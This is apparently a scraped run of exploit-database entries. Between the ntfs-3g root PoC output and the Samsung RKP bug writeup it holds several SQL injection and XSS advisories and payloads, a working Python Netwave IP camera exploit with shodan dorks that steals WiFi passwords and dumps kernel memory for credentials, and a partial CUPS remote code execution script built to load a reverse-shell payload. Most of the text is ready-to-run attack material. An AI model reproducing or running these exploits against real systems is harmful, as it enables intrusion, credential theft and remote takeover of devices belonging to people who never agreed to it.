@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@; @@ @@ : @`` ;@ :@' `@ #` :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:` '@# @@ #` : `'@ :@@' # `@` :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
$ whoami
user
$ ./cve-2017-0358.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
[*] Forging symlinks ...
[*] Pulling in deps ...
[*] Building kernel module ...
[+] SUCCESS: You have root. Don't be evil :)
# whoami
root
EOF
Source: https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=== FOXMOLE - Security Advisory 2016-07-05 ===
Zoneminder multiple vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Versions
=================
Zoneminder 1.29,1.30
Issue Overview
==============
Vulnerability Type: SQL Injection, Cross Site Scripting, Session Fixation, No CSRF Protection
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: Zoneminder
Vendor URL: https://zoneminder.com/
Credits: FOXMOLE employee Tim Herres
Advisory URL: https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
Advisory Status: Public
CVE-Number: NA
CVE URL: NA
OVE-ID:
OVI-ID:
CWE-ID: CWE-89
CVSS 2.0: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Impact
======
During an internal code review multiple vulnerabilities were identified.
The whole application misses input validation and output encoding.
This means user supplied input is inserted in an unsafe way.
This could allow a remote attacker to easily compromise user accounts or access the database in an unsafe way.
Issue Description
=================
The following findings are only examples there are quite more. The whole application should be reviewed.
All items tested using Firefox
1)Cross Site Scripting (XSS)
Reflected: http://192.168.241.131/zm/index.php?view=request&request=log&task=download&key=a9fef1f4&format=texty9fke%27%3Chtml%3E%3Chead%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C/body%3E%3C/html%3Eayn2h
Reflected without authentication: http://192.168.241.131/zm/index.php/LSE4%22%3E%3Cscript%3Ealert(1)%3C/script%3ELSE
Stored: Creating a new monitor using the name "Bla<script>alert(1)</script>". There is only a clientside protection.
2)SQL Injection
Example Url:http://192.168.241.131/zm/index.php
Parameter: limit (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: view=request&request=log&task=query&limit=100;(SELECT *
FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Easy exploitable using sqlmap.
3)Session Fixation
After a successful authentication the Session Cookie ZMSESSID remains the same.
Example: Cookie before the login = ZMSESSID=26ga0i62e4e51mhfcb68nk3dg2 after successful login
ZMSESSID=26ga0i62e4e51mhfcb68nk3dg2
4)No CSRF Proctection
A possible CSRF attack form, which changes the password of the admin (uid=1), if the corresponding user activates it.
<html>
<body>
<form action="http://192.168.241.131/zm/index.php" method="POST">
<input type="hidden" name="view" value="user" />
<input type="hidden" name="action" value="user" />
<input type="hidden" name="uid" value="1" />
<input type="hidden" name="newUser[MonitorIds]" value="" />
<input type="hidden" name="newUser[Username]" value="admin" />
<input type="hidden" name="newUser[Password]"
value="admin1" />
<input type="hidden" name="conf_password" value="admin1" />
<input type="hidden" name="newUser[Language]" value="" />
<input type="hidden" name="newUser[Enabled]" value="1" />
<input type="hidden" name="newUser[Stream]" value="View" />
<input type="hidden" name="newUser[Events]" value="Edit" />
<input type="hidden" name="newUser[Control]" value="Edit" />
<input type="hidden" name="newUser[Monitors]" value="Edit" />
<input type="hidden" name="newUser[Groups]" value="Edit" />
<input type="hidden" name="newUser[System]" value="Edit" />
<input type="hidden" name="newUser[MaxBandwidth]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Temporary Workaround and Fix
============================
FOXMOLE advises to disable Zoneminder until the vendor publishes a complete fix.
History
=======
2016-07-05 Issue discovered
2016-11-22 Vendor contacted, no response
2016-12-16 Vendor contacted again, still no response
2017-01-17 Vendor contacted --> working on a patch
2017-01-22 Vendor contacted, asked for an update and
declare advisory release to 2017-02-02 --> no response
2017-02-02 Advisory Release
GPG Signature
=============
This advisory is signed with the GPG key of the FOXMOLE advisories team.
The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEjrQMZqTYqiY2IftqOBIJIZnjJ3wFAliS758ACgkQOBIJIZnj
J3y4Wg//fi1TrOCwVX4DemeKv2Wm4bf+sBlxhyWX6KRolylHYiReSuID+mAZvYyD
UDMQkWcHKzDXTZKvkNXB6h70r3x/pKKR7SmlaNfFDeCbEgChzDaxCmlzcOaXIzSy
D5S0quuT2OdpQmvMWtrMbJrqdP8I3AW5WJt2F5uc796eUEo9HZZuIC8MxzlzKdgR
dLWyE3fPghECsPBFxstGS9M6iUHnQALYAf7KBVnQmDiidNpCRNzUx8l4YolejBT4
8aGfiQZFJDS8caR0NWWpf0stIayJNVCcxziaRAXyf8BkuHQIK5Ccpfy2q1V4hvWw
tn1p7M8hrY+U1mhH6R8zpK+kcZ2WEvUQd4OCJ5fRB9zo+WFK3Hpr/z1iPTA8TPmd
0y3wwyQOmN1rzIwBEoKpRbPXKwK1bgXn9pwVYPOg7aapaePxtWQXL3zihN4BSQNw
NVXHwuNxCCXH9NLB65MC4mopKPq+alVZUj2IJjDp0DuCP4lG2FFiVkUaf49tV0Mg
8f5GUTYuQCQsa8/acpm4NF40Y/vkaJ7SBzJ8T8j5TDqegnhbdEWlp5Ydx/Z2+Gb7
c6ZYeWxNmsShm01yBw0id75hANKdLBUdNdxTXjxvqryQx7kXQ7ua5TA9m4a0378c
3CBpM2Bor0RtFkhedLLRW4p+8aNUSYuj83ExNAbYk6ZkmcZ2q0E=
=kFiq
-----END PGP SIGNATURE-----
# Exploit Title : Itech Multi Vendor Script - Multiple SQL Injections
# Author : Yunus YILDIRIM (Th3GundY)
# Team : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website : http://www.yunus.ninja
# Contact : yunusyildirim@protonmail.com
# Vendor Homepage : http://itechscripts.com/
# Software Link : http://itechscripts.com/multi-vendor-shopping-script/
# Vuln. Version : 6.49
# Demo : http://multi-vendor.itechscripts.com
# # # # DETAILS # # # #
SQL Injections :
# 1
http://localhost/quickview.php?id=10
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=10 AND 9776=9776
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=10 AND SLEEP(5)
# 2
http://localhost/product.php?id=9
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9 AND 9693=9693
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=9 AND SLEEP(5)
# 3
http://localhost/product_search.php?search=Adidas
Parameter: search (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: search=Adidas%' AND SLEEP(5) AND '%'='
# 4
http://localhost/product_search.php?category_id=1
Parameter: category_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category_id=1 AND 8225=8225
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: category_id=1 AND SLEEP(5)
# 5
http://localhost/product_search.php?category_id=1&sub_category_id=1&sub_sub_category_id=1
Parameter: sub_sub_category_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND 7485=7485
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND SLEEP(5)
# 6
http://localhost/product_search.php?category_id=1&sub_category_id=1
Parameter: sub_category_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category_id=1&sub_category_id=1 AND 5242=5242
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: category_id=1&sub_category_id=1 AND SLEEP(5)
#!/usr/bin/python2.7
##
## spiritnull(at)sigaint.org
##
## Run the exploit against the victim to get WIFI password
## If the victim is vulnerable to memory leak it will try to extract the username and password for the weblogin
##
## magic for you bash:
## wget -qO- http://[HOST]:[PORT]//proc/kcore | strings
## wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat
## wget -qO- http://[HOST]:[PORT]//dev/rom0
## wget -qO- http://[HOST]:[PORT]/get_status.cgi
##
## shodan dork:
## "Server: Netwave IP Camera"
##
## zoomeye dork:
## Netwave IP camera http config
##
import sys,os,time,tailer
import urllib2
import subprocess
import signal
from threading import Thread
try:
if sys.argv[1] == "-h" or sys.argv[1] == "--help":
print "Usage: python pownetwave.py [HOST]:[PORT]"
print "Example: python pownetwave.py 127.0.0.1:81"
sys.exit(0)
else:
pass
except IndexError:
print "Usage: python pownetwave.py [HOST]:[PORT]"
print "Example: python pownetwave.py 127.0.0.1:81"
sys.exit(0)
def signal_handler(signal, frame):
print('\nclearing up..')
os.system("rm -rf tmpstream.txt")
os.system("rm -rf tmpstrings.out")
os.system("killall -9 wget")
os.system("killall -9 tail")
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
macaddr = ""
done = 0
linecount = 0
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
print "getting system information.."+sys.argv[1]
response = urllib2.urlopen('http://'+sys.argv[1]+'/get_status.cgi')
xcontent = response.read().split(";\n")
for line in xcontent:
if line.startswith("var id="):
line = line.split("'")
macaddr = line[1]
else:
pass
print "victims MAC-ADDRESS: "+bcolors.OKGREEN+str(macaddr)+bcolors.ENDC
print "getting wireless information.."
try:
resp = urllib2.urlopen("http://"+sys.argv[1]+"//etc/RT2870STA.dat")
xcontent = resp.read().split("\n")
print "victims wireless information.."
for line in xcontent:
if line.startswith("WPAPSK") or line.startswith("SSID"):
print "\t\t"+bcolors.OKGREEN+str(line)+bcolors.ENDC
else:
print "\t\t"+str(line)
except:
print "wireless lan is disabled.."
print "checking for memory dump vulnerability.."
try:
urllib2.urlopen('http://'+sys.argv[1]+'//proc/kcore')
except:
print bcolors.FAIL+"victim isnt vulnerable for a memory leak, exiting.."+bcolors.ENDC
sys.exit(0)
print "starting to read memory dump.. "+bcolors.WARNING+"this could take a few minutes"+bcolors.ENDC
proc = subprocess.Popen("wget -qO- http://"+sys.argv[1]+"//proc/kcore > tmpstream.txt", shell=True, preexec_fn=os.setsid)
os.system('echo "" >tmpstrings.out')
time.sleep(1)
proc2 = subprocess.Popen("tail -f tmpstream.txt | strings >>tmpstrings.out", shell=True, preexec_fn=os.setsid)
print bcolors.BOLD+"hit CTRL+C to exit.."+bcolors.ENDC
while 1:
sys.stdout.flush()
if os.stat('tmpstrings.out').st_size <= 1024:
sys.stdout.write("binary data: "+str(os.stat('tmpstream.txt').st_size)+"\r")
else:
sys.stdout.flush()
print "strings in binary data found.. password should be around line 10000"
for line in tailer.follow(open('tmpstrings.out','r')):
sys.stdout.flush()
if done == 0:
linecount+= 1
if line == macaddr:
sys.stdout.flush()
done = 1
print bcolors.OKGREEN+"\n\nmac address triggered.. printing the following dumps, could leak username and passwords.."+bcolors.ENDC
else:
sys.stdout.write(str(linecount)+"\r")
elif done == 1:
done = 2
print "\nfirstline.. "+bcolors.OKGREEN+line+bcolors.ENDC
elif done == 2:
done = 3
print "possible username: "+bcolors.OKGREEN+line+bcolors.ENDC
elif done == 3:
done = 4
print "possible password: "+bcolors.OKGREEN+line+bcolors.ENDC
elif done == 4:
done = 0
print "following line.. \n\n"+bcolors.OKGREEN+line+bcolors.ENDC
else:
pass
signal.pause()
Exploit Title: SlimarUSER Management v1.0 – 'id' Parameter SQL Injection
Date: 03.02.2017
Vendor Homepage: http://slimar.org
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
SlimarUSER is a PHP user management system full with features. The system allows website owners to manage their own users with complete login, registration and many other features. It can be used on its own, or integrated into any existing PHP powered website.
Sqlmap command: sqlmap.py -u "http://locahost/userman/inbox.php?p=view&id=7" --cookie="PHPSESSID=de3052c5dbb1d535d423ee1a2dbb076b; id=4; password=%242y%2410%24UuYt6q5GXU5UO37xc3j3GeN2ZM1hHB1sWqsAMs1DXAoeewSH.WYgq" --batch --random-agent --dbms=mysql
Vulnerable Url: http://locahost/userman/inbox.php?p=view&id=[payload]
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=view&id=7' AND 6275=6275 AND 'DFYF'='DFYF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: p=view&id=7' AND SLEEP(5) AND 'HCUm'='HCUm
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=984
As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.
During the initialization of RKP, a special command can be issued by EL1 kernel in order to mark the RKP read-only page as such in the stage 2 translation table. This command, "rkp_set_init_page_ro" (command code 0x51) has the following approximate high-level logic:
__int64 rkp_set_init_page_ro(struct args* args_buffer)
{
unsigned long page_pa = rkp_get_pa(args_buffer->arg0);
if ( page_pa < rkp_get_pa(text) || page_pa >= rkp_get_pa(etext) )
{
if ( !rkp_s2_page_change_permission(page_pa, 128LL, 0, 0) )// RO, XN
return rkp_debug_log("Cred: Unable to set permission for init cred", 0LL, 0LL, 0LL);
}
else
{
rkp_debug_log("Good init CRED is within RO range", 0LL, 0LL, 0LL);
}
rkp_debug_log("init cred page", 0LL, 0LL, 0LL);
return rkp_set_pgt_bitmap(page_pa, 0);
}
As we can see above, the function receives an address in the kernel VAS, and converts it to a physical address by adding a constant offset to it (the virt_to_phys offset for the kernel VAS). Then, the function proceeds to mark the resulting physical address as read-only and non-executable in the stage 2 translation table. Finally, the function proceeds to unset the bit in the RKP page-table bitmap corresponding to the given address. This is meant to indicate to EL1 that the address is protected by a stage 2 mapping.
However, the function fails to validate the bounds of the given virtual address (or the resulting physical address). This means that an attacker can supply any arbitrary address and the function will accept it as valid input. Similarly, the implementation of "rkp_set_pgt_bitmap" performs no such validations:
signed __int64 __fastcall rkp_set_pgt_bitmap(__int64 phys_addr, unsigned char set_or_unset)
{
unsigned long phys_off = phys_addr - 0x80000000LL;
unsigned long bitmap_index = (phys_off >> 18) & 0x3FFFFFFFFFFFLL;
if ( !rkp_pgt_bitmap )
return 0LL;
unsigned long bit_offset = (phys_off >> 12) & 0x3F;
if ( set_or_unset & 0x80 )
{
spin_lock(&rkp_bitmap_spinlock);
*(rkp_pgt_bitmap + 8 * bitmap_index) |= 1LL << bit_offset;
spin_unlock(&rkp_bitmap_spinlock);
result = 1LL;
}
else
{
spin_lock(&rkp_bitmap_spinlock);
*(rkp_pgt_bitmap + 8 * bitmap_index) &= ~(1LL << bit_offset);
spin_unlock(&rkp_bitmap_spinlock);
result = 1LL;
}
return result;
}
The RKP page-table bitmap is only 0x20000 bytes large (each bit denotes a 4KB page, resulting in a supported range of at-most 0x100000000 bytes). The base physical address for the bitmap is the physical base address for the kernel range - 0x80000000.
This means that if an attacker supplies any virtual address that is converted to a physical address not in the range of 0x80000000-0x180000000, the resulting "bitmap_index" will not be within the bitmap's bounds, causing the function to modify a bit out-of-bounds.
An attacker can use this in order to specifically craft an input virtual address so that the resulting calculated "bitmap_index" will have any arbitrary value, thus resulting in a modification at an arbitrary offset from the base of the page-table bitmap, within the context of RKP.
As the bitmap resides directly before RKP's code, an attacker can trivially use this primitive in order to modify the code or data pages belonging to RKP, thus gaining privilege escalation from EL1 to the context of RKP.
I've verified this issue on an SM-G935F device, build version "XXS1APG3". The RKP version present on the device is "RKP4.2_CL7572479".
Proof of concept for the RKP memory corruption in "rkp_set_init_page_ro".
This PoC modifies an instruction within RKP's address space by repeatedly calling "rkp_set_init_page_ro" with faulty input addresses.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41232.zip
#!/usr/bin/python
# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution
# Google Dork: n/a
# Date: 2/2/17
# Exploit Author: @0x00string
# Vendor Homepage: cups.org
# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2
# Version: <2.0.3
# Tested on: Ubuntu 14/15
# CVE : CVE-2015-1158
import os, re, socket, random, time, getopt, sys
from socket import *
from struct import *
def banner():
print '''
lol ty google
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py
'''
def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target IPP service port\n"
" -c, --lib /path/to/payload.so\n"
" -f, --stomp-only Only stomp the ACL (no postex)\n"
"\n"
"Examples:\n"
"python script.py -a 10.10.10.10 -b 631 -f\n"
"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\n")
exit()
def pretty (t, m):
if (t is "+"):
print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
elif (t is "-"):
print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
elif (t is "*"):
print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
elif (t is "!"):
print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",
def createDump (input):
d, b, h = '', [], []
u = list(input)
for e in u:
h.append(e.encode("hex"))
if e == '0x0':
b.append('0')
elif 30 > ord(e) or ord(e) > 128:
b.append('.')
elif 30 < ord(e) or ord(e) < 128:
b.append(e)
i = 0
while i < len(h):
if (len(h) - i ) >= 16:
d += ' '.join(h[i:i+16])
d += " "
d += ' '.join(b[i:i+16])
d += "\n"
i = i + 16
else:
d += ' '.join(h[i:(len(h) - 0 )])
pad = len(' '.join(h[i:(len(h) - 0 )]))
d += ' ' * (56 - pad)
d += ' '.join(b[i:(len(h) - 0 )])
d += "\n"
i = i + len(h)
return d
class tcpsock:
def __init__(self, sock=None):
if sock is None:
self.sock = socket(
AF_INET, SOCK_STREAM)
self.sock.settimeout(30)
else:
self.sock = sock
def connect(self, host, port):
self.sock.connect((host, int(port)))
def tx(self, msg):
self.sock.send(msg)
def rx(self):
tmp = self.sock.recv(1024)
msg = ""
while tmp:
msg += tmp
tmp = self.sock.recv(1024)
return msg
def txrx (ip, port, proto, txpacket):
if (proto is "tcp"):
sock = tcpsock()
elif (proto is "udp"):
sock = udpsock()
else:
return None
sock.connect(ip, port)
sock.tx(txpacket)
rxpacket = sock.rx()
return rxpacket
def locatePrinters(rhost, rport="631"):
request = ( "GET /printers HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
response = txrx(rhost, int(rport), "tcp", request)
if response is not None:
m = re.search('<TR><TD><A HREF="(.+)">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)
if m is not None:
printer = m.group(1)
pretty("+","printer found: " + printer)
return printer
else:
pretty("-","no printers")
exit(1)
else:
pretty("-","no printers")
exit(1)
def preparePayload(libpath):
with open(libpath, 'rb') as f:
payload = f.read()
if payload is not None:
pretty("*","Payload:\n" + createDump(payload))
else:
pretty("-","something went wrong")
usage()
return payload
def seedTarget(rhost, rport, printer, payload):
i = random.randint(1,3)
reqid = str(pack(">i",(i+2)))
reqid2 = str(pack(">i",(i+3)))
printer_uri = "ipp://" + rhost + ":" + str(rport) + printer
create_job_packet = ("\x02\x00"
"\x00\x05"+
reqid+
"\x01"
"\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
"\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
"\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
"\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
"\x42"+"\x00\x08"+"job-name"+"\x00\x06"+"badlib"
"\x02"
"\x21"+"\x00\x06"+"copies"+"\x00\x04"+"\x00\x00\x00\x01"
"\x23"+"\x00\x0a"+"finishings"+"\x00\x04"+"\x00\x00\x00\x03"
"\x42"+"\x00\x10"+"job-cancel-after"+"\x00\x05"+"\x31\x30\x38\x30\x30"
"\x44"+"\x00\x0e"+"job-hold-until"+"\x00\x0a"+"indefinite"
"\x21"+"\x00\x0c"+"job-priority"+"\x00\x04"+"\x00\x00\x00\x32"
"\x42"+"\x00\x0a"+"job-sheets"+"\x00\x04"+"none"+"\x42"+"\x00\x00\x00\x04"+"none"
"\x21"+"\x00\x09"+"number-up"+"\x00\x04"+"\x00\x00\x00\x01"
"\x03")
pretty("*","Sending createJob")
http_header1 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(create_job_packet) + 0) + "\x0d\x0a"
"\x0d\x0a")
createJobRequest = http_header1 + create_job_packet
blah = txrx(rhost,int(rport),"tcp",createJobRequest)
if blah is not None:
m = re.search("ipp://" + rhost + ":" + str(rport) + "/jobs/(\d+)",blah)
if m is not None:
jobid = m.group(1)
else:
pretty("-","something went wrong");
exit()
pretty("*","\n" + createDump(blah) + "\n")
pretty("*", "Sending sendJob")
send_document_packet = ("\x02\x00"
"\x00\x06"+
reqid2+
"\x01"
"\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
"\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
"\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
"\x21"+"\x00\x06"+"job-id"+"\x00\x04"+ str(pack(">i", int(jobid))) +
"\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
"\x42"+"\x00\x0d"+"document-name"+"\x00\x06"+"badlib"
"\x49"+"\x00\x0f"+"document-format"+"\x00\x18"+"application/octet-stream"
"\x22"+"\x00\x0d"+"last-document"+"\x00\x01"+"\x01"
"\x03"+
payload)
http_header2 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(send_document_packet) + 0) + "\x0d\x0a"
"\x0d\x0a")
sendJobRequest = http_header2 + send_document_packet
blah2 = txrx(rhost,int(rport),"tcp",sendJobRequest)
pretty("*","\n" + createDump(blah) + "\n")
pretty("*","job id: " + jobid)
return jobid
def stompACL(rhost, rport, printer):
i = random.randint(1,1024)
printer_url = "ipp://" + rhost + ":" + rport + printer
admin_stomp = ("\x02\x00" # vers 2.0
"\x00\x05"+ # op id: Create Job (0x0005)
str(pack(">i",(i+1)))+
"\x01" # op attributes marker
"\x47" # charset
"\x00\x12" # name len: 18
"attributes-charset"
"\x00\x08" # val len: 8
"us-ascii"
"\x48" # natural language
"\x00\x1b" # name len: 27
"attributes-natural-language"
"\x00\x06" # val len: 6
"/admin"
"\x45" # printer-uri
"\x00\x0b" # name len 11
"printer-uri" +
str(pack(">h", len(printer_url))) + printer_url +
"\x42" # name without lang
"\x00\x14" # name len: 20
"requesting-user-name"
"\x00\x06" # val len: 6
"/admin"
"\x02" # job attrs marker
"\x21" # integer
"\x00\x06" # name len: 6
"copies"
"\x00\x04" # val len: 4
"\x00\x00\x00\x01" # 1
"\x42" # name w/o lang
"\x00\x19" # name len: 25
"job-originating-host-name"
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x36" # nwl
"\x00\x00" # name len: 0
"\x00\x16" # val len: 22
"\x00\x06" # length
"/admin"
"\x00\x0c"
"BBBBBBBBBBBB"
"\x03") # end of attributes
conf_stomp = ("\x02\x00" # vers 2.0
"\x00\x05"+ # op id: Create Job (0x0005)
str(pack(">i",(i+2)))+
"\x01" # op attributes marker
"\x47" # charset
"\x00\x12" # name len: 18
"attributes-charset"
"\x00\x08" # val len: 8
"us-ascii"
"\x48" # natural language
"\x00\x1b" # name len: 27
"attributes-natural-language"
"\x00\x0b" # val len: 11
"/admin/conf"
"\x45" # printer-uri
"\x00\x0b" # name len 11
"printer-uri" +
str(pack(">h", len(printer_url))) + printer_url +
"\x42" # name without lang
"\x00\x14" # name len: 20
"requesting-user-name"
"\x00\x0b" # val len: 11
"/admin/conf"
"\x02" # job attrs marker
"\x21" # integer
"\x00\x06" # name len: 6
"copies"
"\x00\x04" # val len: 4
"\x00\x00\x00\x01" # 1
"\x42" # name w/o lang
"\x00\x19" # name len: 25
"job-originating-host-name"
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x36" # nwl
"\x00\x00" # name len: 0
"\x00\x1b" # val len: 27
"\x00\x0b" # length
"/admin/conf"
"\x00\x0c"
"BBBBBBBBBBBB"
"\x03") # end of attributes
http_header1 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(admin_stomp)) + "\x0d\x0a"
